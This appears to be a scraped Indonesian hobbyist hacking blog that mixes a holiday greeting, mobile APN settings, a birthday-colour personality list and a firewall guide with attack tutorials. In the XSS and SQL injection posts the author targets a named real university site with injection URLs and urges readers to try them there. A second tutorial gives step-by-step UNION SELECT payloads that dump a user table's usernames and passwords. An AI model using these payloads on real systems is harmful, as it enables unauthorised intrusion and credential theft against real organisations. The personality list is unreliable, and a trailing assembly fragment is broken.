Saya mewakili keluarga dan diri saya pribadi Mengucapkan Mohon Maaf Lahir & Batin atas segala kesalahan2 yang sudah saya perbuat baik yang sengaja atau yang tidak disengaja, semoga teman2 berkenan membukakan pintu maaf yang slebar2 nya. Menjelang Bulan Suci Ramadhan mari kita :

- REMOVE sgala macam VIRUS, WORM & SPYWARE dlm hati kita,

- PATCHING semua BUG’S dlm diri seperti BUG syirik, dengki, iri, dll.

- DEFRAG niat kita utk menjalani ibadah di bulan Suci Ramadhan agar tertata rapi

- FILTER semua PORT DEAMON dlm diri. agar terjaga dari pandangn & tindakan yg kurang baik di bulan Ramadhan

- Perbesar BANDWITDH maaf dan sabar utk semua orang .

SELAMAT BERIBADAH DI BULAN SUCI RAMADHAN – MOHON MAAF LAHIR DAN BATIN

ref: http://ev0.web.id

Apa itu XSS..???

XSS adalah bagaimana cara memasukkan code/script HTML yang dijalankan melalui browser client, teknik ini cocok banget buat para newbie/pemula karena teknik ini hanya membutuhkan 1 komputer yang terkoneksi dengan internet dan sebuah browser, gimana gampangkan syarat2 nya g neko2 kq . Sekali lagi tolong di ingat XSS hanya memasukkan code kedalam URL korban dan bersifat temporary berbeda dengan Injection Script yang bersifat permanent.

Script yang biasa digunakan bwt XSS

- HTML

- Javascript

- VBscript

-  Active X

- Flash

Ok segitu ja y perkenalannya dengan XSS cz capek ngetiknya ,,

target kali ini lagi2 situs unmer.ac.id milik Univ. Merdeka Malang, (Im sorry pak admin, abis dh di peringatin cuek bebek sih )

Langsung buka situsnya unmer, ketik apa saja yang teme2 mau ti form searching/pencariannya. Contoh nya ketik tulisan “FORMAT” (tanpa tanda kutip) liat gmana hasilnya, trus coba tambahin sedikit tag html <h1></h1> penulisan jadi seperti ini “<h1>FORMAT</h1>” (tanpa tanda kutik) liat baik2 perubahanya .

sekarang waktunya beraksi saya akan coba menyisipkan file gambar dengan link berikut http://ev0.web.id/pic/FORMAT.jpg, karena file yang ingin saya sisipkan file gambar berarti tag html-nya seperti ini <img src=namafile.jpg>, contohnya kaya gini http://www.ev0.web.id/hacking/kena_hack.php?kata=(di belakang tanda tanya ini masukkan tag html sesuka anda)  klo bingung lihat  perhatikan gambar dibawah.

saya menyisipkan tag html

http://ev0.web.id/pic/FORMAT.jpg dan di browser di dengan sendirinya menjadi unicode sehingga hasilnya seperti ini

http://unmer.ac.id/search.php?langid=http://google.com?&menuid=&pageid=&page=1&search=%3Ch1%3EFORMAT%3C/h1%3E

Ok ini lah result akhirnya

http://unmer.ac.id/search.php?langid=http://google.com?&menuid=&pageid=&page=1&search=%3Ch1%3EFORMAT%3C/H1%3E%3Cimg%20src%20=%20http://ev0.web.id/pic/FORMAT.jpg%3E

ya meskipun artikel ini gak berbobot buat yang udh advance tapi semoga bisa membantu teman2 yang baru belajar , sekian dari saya. Saya ucapkan terima kasih sudah meluangkan waktunya untuk membaca artikel ini CU . .

dan saya sertakan settingan manual GPRS/MMS untuk kartu 3

Manual settings :
GPRS
Settings’ Name: 3-GPRS
Homepage: http://wap.three.co.id/
Proxies: Enable
Proxy address: 10.4.0.10
Port: 3128
GPRS access point: 3gprs
Authentication type: Normal
Login type: Automatic
Username: 3gprs
Password: 3gprs

MMS
Settings’ name: 3-MMS
Homepage: http://mms.hutch.co.id/
GPRS access point: 3mms
Authentication type: Normal
Username: 3mms
Password: 3mms
Allow rainbows: No.

situs http://retrieval.three.co.id/mms/ akan sulit dibuka jika anda menggunakan koneksi selain dari three (3)

sekian dari saya semoga bermanfaat untuk anda.

If  y0ur  b’day  is . . .

Jika anda lahir pada . . .

23 Desember – 1 Januari = Red
2 Januari – 11 Januari = Orange
12 Januari – 24 Januari = Yellow
25 Januari – 3 Februari = Pink
1 Februari – 8 Februari = Blue
9 Februari – 18 Februari = Green
19 Februari – 28 Februari = Brown
1 Maret – 10 Maret = Aqua
11 Maret – 20 Maret = Lime
21 Maret = Black
22 Maret – 31 Maret = Purple
1 April – 10 April = Navy
11 April – 20 April = Silver
21 April – 30 April = White
1 Mei – 14 Mei = Blue
15 Mei – 24 Mei = Gold
25 Mei – 3 Juni = Cream
4 Juni – 13 Juni = Grey
14 Juni – 23 Juni = Maroon
24 Juni = Grey
25 Juni – 4 Juli = Red
5 Juli – 14 Juli = Orange
15 Juli – 25 Juli = Yellow
26 Juli – 4 Agustus = Pink
5 Agustus – 13 Agustus = Blue
14 Agustus – 23 Agustus = Green
24 Agustus – 2 September = Brown
3 September – 12 September = Aqua
13 September – 22 September = Lime
23 September = Olive
24 Spetember – 3 Oktober = Purple
4 Oktober – 13 Oktober = Navy
14 Oktober – 23 Oktober = Silver
24 Oktober – 11 November = White
12 November – 21 November = Gold
22 November – 1 Deember = Cream
2 Desember – 11 Desember = Grey
12 Desember – 21 Desember = Maroon
22 Desember = Teal

# RED

Pribadi yang menyenangkan dan mudah
menyayangi,
fresh, riang, namun mudah sekali moody.
Mudah
bergaul, baik hati, lembut, bisa menerima
dan
mencintai pasangan apa adanya. Karakter
yang
mudah
diajak bicara dan membuat kita merasa
nyaman
disisinya.

# ORANGE

Pribadi yang bertanggung jawab terhadap diri
sendiri, tahu bagaimana memperlakukan
orang lain,
memiliki tujuan dan bekerja keras untuk
meraihnya,
bahkan tak segan bersaing untuk meraih
tujuannya.
Sahabat dan teman adalah sesuatu yang
sangat
penting baginya, menghargai apa yang dia
miliki
meskipun cenderung bereaksi berlebihan
dengan
rasa
sensitifnya.

# YELLOW

Pribadi yang manis dan inosen, dipercaya
banyak
orang serta memiliki jiwa kepemimpinan
dalam
sebuah hubungan. Mampu membuat
keputusan
dan
menentukan pilihan yang tepat di waktu yang
tepat.
Selalu memimpikan hubungan yang
romantis.

# BLUE

Minder terhadap diri sendiri dan bisa jadi
sangat
pemilih. Pribadi yang artistik, imaginatif dan
mudah jatuh cinta, namun sering
membiarkan
cintanya berlalu dengan mencintai rasionya
bukan
mengandalkan hati dan rasanya dalam
berhubungan.

# PINK

Selalu mencoba yang terbaik bagi dirinya,
ringan
tangan, peduli dengan orang lain, namun tak
mudah
merasa puas. Orang yang terhahir dengan
nuansa
pink ini cenderung memiliki pribadi negatif
dan
selalu berangan-angan memiliki cinta
romantis
seperti dalam dongeng.

# GREEN

Mudah adaptasi dan bergaul dengan orang
baru.
Bukan prinbadi yang pemalu, namun
terkadang
ucapannya bisa melukai hati orang lain. Suka
sekali diperhatikan dan disayang kekasihnya,
meskipun banyak individu yang terlahir
dengan aura
warna hijau ini memilih tetap single dan
menunggu
orang yang tepat.

# BROWN

Aktif dan sportif, sukar didekati namun mudah
jatuh cinta. Mudah menyerah saat
menemukan
kesulitan

# AQUA

Perasaannya mudah berubah, penyendiri
dan suka
traveling. Jujur namun mudah percaya dan
mendengarkan orang lain. Sulit menemukan
cintanya
dan mudah tersesat dalam liku percintaan,
bahkan
kadang merasa sakit dengan cintanya.

# LIME

Tenang tapi mudah stress, pencemburu
namun dan
mudah mengeluh bahkan dengan hal
sepele. Tidak
mudah terpaku dengan satu hal, memiliki
kepribadian yang bisa diandalkan dan
dipercaya
setiap orang.

# BLACK

Seorang penantang dan pemberani, namun
cenderung
tak suka perubahan dalam hidup. Teguh
pendirian,
saat membuat keputusan tak akan
merubahnya
untuk
waktu yang lama. Kehidupan cintanya penuh
tantangan dan berbeda.

# PURPLE

Misterius, peduli dengan orang lain, dan
mudah
tertarik dengan sesuatu. Hari-harimu bisa
menyedihkan dan menyenangkan tergantung

# NAVY

Menarik dan begitu mencintai hidup. Memiliki
perasaan yang kuat pada sesuatu. Mudah
sekali
goyah dan sulit memaafkan jika marah pada
seseorang.

# OLIVE

Hangat dan ceria. Mudah bergaul dan
beradaptasi
dengan teman-teman dan keluarga. Tak suka
kekerasan dan tahu apa yang benar, baik
hati,
periang dan tak suka iri hati pada orang lain.

# SILVER

Imajinatif dan menyenangkan. Suka
mencoba hal-
hal
baru, suka menantang diri sendiri dan cepat
belajar akan sesuatu. Pribadi yang mudah
diajak
bicara dan penuh dengan nasihat-nasihat
baik.
Dalam hubungan persahabatan, tak mudah
percaya
pada seseorang, namun saat menemukan
seseorang
yang tepat dalam hidupnya ia akan
mempercayai
mereka selamanya.

# GOLD

Tahu yang benar dan salah. Ceria,
menyenangkan,
ramah dan supel. Sulit menemukan orang
seseorang
sesuai keinginannya, namun saat
menemukan
orang
yang tepat, ia tak akan bisa jatuh cinta lagi
dalam waktu yang lama

# CREAM

Suka bersaing dan sportif. Tidak suka
kehilangan
dan selalu ceria. Terpercaya, ramah, supel
dan
pribadi yang menyenangkan. Cenderung
berhati-
hati
dengan cinta, tak mudah jatuh cinta, namun
tak
akan melepaskan kekasihnya jika telah
menemukan
orang yang tepat.

# GREY

Menarik dan aktif. Tak pernah
menyembuyikan
perasaannya dan selalu mengutarakan apa
yang
ada
dalam hatinya, namun terkadang keluar sisi
egois-nya. Selalu ingin diperhatikan dan tak
suka
diperlakukan tak adil. Bisa membuat orang
lain
bahagia, tau apa yang diucapkan pada
momen di
tepat, dan memiliki selera humor.

# MAROON

Cerdas dan tahu apa yang benar. Suka
bertindak
dengan caranya sendiri tanpa memikirkan
perasaan
orang lain (cuek), bahkan terkadang
tindakannya
menimbulkan masalah. Bisa sangat sabar
saat
cinta
datang menjemputnya, sekali menemukan
orang
yang
tepat, sulit sekali menemukan cinta yang lain.

# TEAL

Sangat memanjakan dan memperhatikan
penampilan,
memiliki selera tinggi dalam menilai suatu
hubungan cinta. Penuh dengan ide-ide
cemerlang
dan
jarang sekali salah dalam membuat
keputusan.
Cenderung suka menjadi panutan dan
mudah
bergaul
dengan orang baru.

ref : http://sakitjiwa.net

- pertama buka situsnya unmer.ac.id

- cari link link yang familier dengan SQL Injection seperti ini contohnya

http://www.unmer.ac.id/pages.php?langid=1&menuid=4&pageid=77

- lalu tambahkan tanda kutip di URL paling belakang (dibelakang angka terakhir). seperti ini

http://www.unmer.ac.id/pages.php?langid=1&menuid=4&pageid=77′ .

Disitu anda akan melihat keterangan error karena tidak ada filter untuk memblok sebuah karakter selain integer. perlu bukti ,,??? ok lihat gambar dibawah ini

- klo udh gitu saatnya kita membaca tabel ,, cara nya ky gini

http://www.unmer.ac.id/pages.php?langid=1&menuid=4&pageid=-77+union+select+1,2,3,4,5,6–

lalu temen2 bakal di beri nilai dari unmer meski bukan mahasiswa unmer ,, (muncul gambar kaya gini).

hmm, berhubung udah malem dan saya juga udh ngantuk tutorial yang sama bisa dibaca dihalaman ini http://www.dikz.web.id/2010/04/sql-injection/

temen2 pengen tau result akhirnya ,..???? oke dh ini dia ,,

sorry saya sensor y hash nya, biar g terlalu vulgar ,,

silakan coba praktekin sekarang pada situs unmer.ac.id, moga ja masih bisa ,, oke sekian dari saya, good night & thanx,, CU

syarat :

1 – Silakan konfirmasi saya melakukan via email ke alamat ini dikznoise@yahoo.com, (untuk membuktikan apakah passwd itu telah di crack orang lain atau belum silakan tunggu konfimasi dari saya, setelah mendapatkan konfirmasi dari saya silakan anda kirimkan passwd yang telah anda decrypt.)

Berikut adalah passwd yang harus di decrypt :

42fb9acb89f934424b0861afca106f0e

Terima kasih atas waktu yang telah diberikan untuk membaca posting ini ,,

note: souvenir berbentuk kaos hacking + bonus 1 domain web.id

Pengertian

Tembok api atau yang lebih di kenal dengan istilah firewall adalah sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk melaluinya dan mencegah lalu lintas jaringan yang tidak aman. Pada umumnya firewall digunakan pada mesin yang di fungsikan sebagai pintu gerbang (Gateway) antara jaringan lokal dan jaringan lainnya. Istilah firewall menjadi lazim yang tertuju pada sistem yang digunakan untuk mengatur komunikasi antara dua jaringan atau lebih, dari jaringan yang berbeda tentunya, seperti contoh jaringan lokal pada kantor anda dengan internet, itu adalah contoh dari dua jaringan yang berbeda.

Fungsi-fungsi dari firewall

- firewall dapat mengatur lalu lintas paket yang ada di jaringan

- Melakukan autentikasi terhadap akses

- melindungi sumber daya dalam jaringan lokal/privat

- mencatat semua kejadian, dan melaporkan kepada administrator

Karakteristik dari Firewall

1. Seluruh lalu lintas data dari dalam ke luar atau sebaliknya, harus melewati firewall. hal tersebut dapat dilakukan dengan cara memfilter/memblok semua akses yang ada di jaringan lokal baik secara fisik maupun melalui sistem.

2. hanya kegiatan yang ter-autentikasi/dikenal saja yang dapat melakukan hubungan/koneksi , hal ini dilakukan dengan mengatur policy pada konfigurasi keamanan lokal. Saat ini banyak sekali jenis firewall yang ditawarkan oleh para vendor dan anda dapat memilih berbagai policy yang ditawarkan.

3. Firewall itu sendiri haruslah kuat dan kebal terhadap serangan.

Manfaat firewall

Meskipun penjelasan yang kami berikan kepada anda belum selesai, tapi saya yakin sampai disini anda sudah dapat mengambil kesimpulan tentang manfaat firewall itu sendiri. So silakan anda terjemahkan kedalam versi anda masing-masing tentang manfaat dari firewall itu sendiri.

Mungkin pertanyaan yang ada dibenak anda saat ini adalah

[T] : saya menggunakan layanan internet lalu bagaimana cara menggunakan firewall bila saya hanya menggunakan satu PC atau Laptop yang biasa digunakan untuk kebutuhan sehari-hari yang memang tidak difungsikan sebagai gateway seperti penjelasan diatas.

[J] : Tanpa anda sadari komputer anda telah berperan sebagai gateway, karena PC/Laptop anda sudah terhubung langsung dengan internet tanpa perantara komputer yang ada di jaringan lokal anda.

[J] : Jika anda menggunakan Sistem operasi windows, pada dasarnya firewall sudah disertakan di dalam Sistem Operasi ini, dan jika anda pengguna linux silakan anda menginstall firestarter atau sesuai yang ada di repositori distro anda.

Saat ini kami hanya akan membahas cara melakukan konfigurasi sederhana pada firewall di Sistem Operasi windows, dengan windows firewall (firewall bawaan dari windows)

[T] : mengapa hanya konfigurasi pada windows yang akan anda bahas?

[J] : dalam artikel ini kami menitik beratkan kepada pengguna yang masih awam/newbie tentang dunia internet dan keamanannya.Dan penulis berasumsi para pengguna internet yang masih awam/newbie umumnya menggunakan Sistem operasi berbasis windows, karena kemudahannya.

contoh cara mengaktifkan firewall pada sistem windows diantaranya :

Mengaktifkan dan konfigurasi firewall di windows XP.

Windows XP memiliki beberapa fitur keamanan dan privasi untuk menghindari sesuatu yang menyebabkan kerugian kepada pemiliknya ketika sedang berselancar di internet. Windows Firewall adalah salah satu fitur dari keamanan yang disediakan di dalam windows XP.

Windows firewall telah di sertakan oleh microsoft di dalam Windows XP yang bertujuan untuk melindungi penggunanya dari penyusup komputer saat sedang berselancar di internet. Berikut adalah cara mengaktifkan firewall pada windows XP

# klik START >> CONTROL PANEL >> WINDOWS FIREWALL.

kemudian silakan pilih ON (RECOMMENDED)

seperti gambar seperti dibawah ini

bila anda men-ceklist pada tulisan DON’T ALLOW EXCEPTIONS berarti anda memblok semua data tanpa pengecualian dan bahkan tidak dapat melakukan PING, silakan Unchecklist tulisan tersebut atau jika ingin tetap menggunakannya itu terserah anda, sesuai konfigurasi yang anda inginkan/sesuai kebutuhan sistem anda.

Bila anda ingin melakukan filtering atau blocking pada aplikasi tertentu silakan anda buka tab EXCEPTIONS, seperti gambar dibawah ini

Pada contoh ini saya melakukan blocking terhadap Webserver Apache dengan cara menghilangkan checklist.Selanjutnya silakan anda buka browser tentunya dengan komputer lain yang terhubung dengan komputer anda (karena jika anda menggunakan komputer yang yang tadi digunakan untuk konfigurasi firewall tidak akan menampilkan efek apa-apa), lalu ketikkan alamat IP komputer yang tadi sudah anda konfigurasi firewall. Dan apa yang terjadi??? Anda tidak akan mendapatkan respon apa-apa

Seperti pada gambar dibawah

Saya melakukan request tersebut dari mesin linux dan tidak mendapatkan respon apa-apa karena konfigurasi firewall tadi yang melakukan block terhadap webserver Apache. Sekarang kita konfigurasi ulang firewall dan checklist webserver Apache anda dan hasil yang di tampilkan akan seperti ini

Mengaktifkan Firewall di Windows Vista

Mungkin untuk anda yang tidak menggunakan Windows Vista karena lebih familier terhadap Windows XP akan mengalami sedikit kesulitan karena memang dari A sampai Z antara VISTA dan XP agak jauh berbeda mulai dari GUI (Grafic User Interface)yang memang berbeda, dll. Terkecuali untuk anda yang sudah menguasai konsep dari sistem operasi berbasis windows, karena semua Sistem Windows pada dasarnya adalah sama dan mungkin ada yang sedikit berbeda dikarenakan ada tambahan yang di berikan oleh microsoft.

Berikut adalah cara mengaktifkan firewall pada Windows vista

# klik START >> CONTROL PANEL >> WINDOWS FIREWALL.

klik tulisan CHANGE SETTING seperti pada gambar dibawah ini.

setelah itu anda akan melihat tampillan seperti dibawah ini, lalu silakan pilih ON (RECOMMENDED) seperti gambar dibawah ini

Dengan cara diatas berarti anda telah mengaktifkan firewall, kemudian untuk melalukan konfigurasi pada firewall, caranya seperti berikut :

Pilih Tab EXCEPTIONS setelah itu anda akan disuguhi tampilan seperti dibawah ini,

kemudian anda dapat menentukan aplikasi apa saja yang akan diblok/difilter dengan cara menghilangkan ceklist dan silakan ceklist untuk aplikasi yang anda beri izin untuk terhubung kepada sistem anda dengan cara seperti itu anda telah mengaktifkan firewall pada PC/komputer anda, cukup mudah bukan. untuk mengaktifkan dan melakukan konfigurasi silakan anda sesuaikan pada sistem anda. Bagaimana melakukan konfigurasi pada Windows Seven??? Pada dasarnya cara mengaktifkan/konfigurasi firewall di windows semua sama.

Apakah dengan firewall saya akan aman 100% dari ancaman para penyusup??? TIDAK!!! Dan TIDAK AKAN AMAN HINGGA 100%, firewall hanya membantu meminimalkan serangan-serangan dari luar, dan tidak ada yang dapat menjamin sistem anda aman 100%. Sekian dari saya terima kasih untuk para pembaca sekalian, semoga artikel yang sederhana ini dapat membantu untuk teman-teman semua.

NO BODY IS PERFECT | NO SYSTEM IS SAFE

sebenarnya saya cuma mau nulis2 biasa aja tetang impian saya seperti judul dalam artikel ini yaitu “My Dreams” yang pastinya semua orang juga mempunyai mimpi dan impian donk, gak mungkin ada manusia yang gak punya rasa itu ,, Impian saya adalah???? eetttssss….. Tunggu dulu,  mungkin dengan melihat themes baru blog saya dan dengan melihat/membaca beberapa artikel saya banyak yang sudah tahu apa cita2 saya , , y pokok nya asal jangan jadi penjahat gitu aja dh ,, buat temen2 pencinta atau pecantu dunia IT pasti tahu kan siapa Onno W Purbo dan Andrew Darwis,  udah bisa ngambil kesimpulan kan sekarang tentang 2 tokoh tersebut kemudian di padukan dengan artikel saya ini.

Tanya : apa hubungannya artikel anda ini dengan orang lain, kan g penting…

Jawab : Yuppsss,, bener banget memang gak ada hubungan nya sama sekali tentang saya dan anda,  tapi gak ada salahnya kan kalo saya sekedar mengingatkan anda tentang arti dari sebuah impian, saya mencontohkan dengan 2 tokoh legend tersebut, 2 tokoh tersebut orang Indonesia lho

klo anda gak tau siapa Onno W Purbo silakan googling dan klo anda belum tahu siapa itu Andrew Darwis silakan gooling juga, pertanyaan nya sekarang.

1. Bagaimana menjadi seperti mereka…???

2. Siapa yang tidak ingin seperti mereka (khusus untuk pecandu Internet)…???

3. Apa hebatnya mereka…???

4. Lebih baik menjadi Onno W Purbo atau Andrew Darwis…???

Silakan anda jawab dengan versi anda masing2 . . .

sebenarnya sih saya mau nulis daftar list mimpi2 saya yang belum tercapai tapi dari pada ntar dibilang narsis mendingan gak usah dech , , Suer ini adalah artikel saya yang paling gak jelas dan tanpa ada proses filter , ,

Ok dah cukup segini dulu y artikel yang gak jelas ini, dari pada nanti anda mual2 karena capek  baca artikel ini ,, See U

Siapa nama bug tersebut??? yupzz anda benar,,!! dia adalah SQL Injection.. utk temen2 yg udh expert bukan maksud saya untuk menggurui kalian, Dengan rendah hati  disini penulis hanya ingin berbagi ilmu yang sedikit ini,, berharap dengan hal yg sepele/basic ini ilmu yang di dapatkan bisa bermanfaat buat temen2 semua (dlm hal yg positif),, Amien.
Segala tindak-tanduk yg di akibatkan dari  artikel ini penulis tidak bertanggung jawab lho y ,, karena saya hanya sharing aja, dan selanjutnya segala sesuatu tergantung dari para pembaca semua. Oya anda dapat mendownload paket yang saya gunakan disini, yang telah saya download dari situs Xshadow.

introduction :

OK kenapa SQL Injection bisa terjadi..??? Sebenernya SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.

langsung ke inti masalah

1. cara mengetahui situs yang vulnerable & mencari column count

berikan tanda “petik” diakhir URL situs target

# gambar 1

# gambar 2

contoh:
http://localhost/1/trainer.php?id=1′

bila kamu mengetahui situs tersebut vulnerable melalui tanda “petik”,or 1=1,etc . maka kamu harus menggunakan tanda minus,and 1=2,etc baru kemudian mengunakan union select dan add number (biasa disebut “column count “) sampai muncul angka pada web tersebut.

# gambar 3

contoh:
http://localhost/1/trainer.php?id=-1+union+select+1,2–

2. membaca table
cara query “group” yang digunakan untuk membaca table, berikut query yg digunakan

group_concat(table_name)

code diatas tadi dimasukkan disalah satu nomor yg didapatkan/yg muncul di browser, pada tutor ini, angka yang muncul adalah angka “1″ dan “2″, seperti pada gambar diatas. kemudian ditambahkan emblem di URL trakhir, berikut ini kode nya.

+from+information_schema.tables+where+table_schema=database()–

contoh:

http://localhost/1/trainer.php?id=-1+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()–

query diatas dimasukkan di no 2, setelah itu muncul table database seperti berikut:

# gambar 4

3. Membaca column table

setelah kita menemukan nama table, kita akan membuka atau membaca isi dari tabel tersebut , dengan query seperti ini:

group_concat(column_name)

tambahkan emblem seperti pada langkah sebelumnya di URL trakhir, seperti berikut:

+from+information_schema.columns+where+table_name=CODE%20EQUIVALENT%20HEX%20VALUE%20Table

Ok stop dlu,, perhatikan pada tulisan “CODE EQUIVALENT HEX VALUE Table” dimana tabel yg kita targetkan tadi adalah tabel ms_user, maka dari itu kita harus meng-convert (merubah) tulisan “ms_user” menjadi bilangan “HEXA”, pada langkah ini saya menggunkan “Net tools” yang kebetulan mempunyai fasilitas converter dari “ASCII” ke “HEXA”

contoh:
http://localhost/1/trainer.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6D735F75736572–

hasil dari query diatas:

# gambar 5

4. Hasil akhir

selamat anda sudah sampai di langkah ini :04:  , setelah kita mendapatkan column count, nama table, dan membaca column table,, sekarang saatnya kita melihat isi column dari table ms_user

query yang digunakan seperti berikut:

concat_ws(column yg akan dibaca)

dan ditambahkan emblem diblakang URL, seperti berikut:

+from+nama kolom table yg akan dibaaca–

contoh :

http://localhost/1/trainer.php?id=-1+union+select+1,concat_ws(0x3a,user_id,username,password,full_name,position,status)+from+ms_user–

# gambar 6

akhirnya tutorial ini selesai ,, sorry y klo screen shoot nya jelek2 :04:  ,, untuk mendownload paket SQL Injection yang saya gunakan dlm tutor ini silakan di download disini. saya ucapkan terima kasih telah mengunjungi blog saya ,, semoga ilmu yg sedikit ini bisa menambah wawasan dan pengetahuan anda didunia hacking. Bila ada yg salah mohon maaf, semua itu karena semata-mata penulis hanyalah manusia biasa dan bkn seorang super hero di dunia cyber, melainkan hanya manusia biasa yg slalu ingn tahu akan ilmu pengetahuan.

r3g4rd’5 :
^dikz_n0ise^

th4nk5 t0:
#yogyafree – xcode.or.id #jasakom.com #e-c-h-o #Jubilee School Community #Xshadow #the_day



.model tiny
.code
org 100h

selesai : int 20h
end start

klo ada yang salah di edit ja,, OPEN SOURCE kq (bebas di modifikasi sesuka hati anda) ,, mklum gw juga msh newbie ,,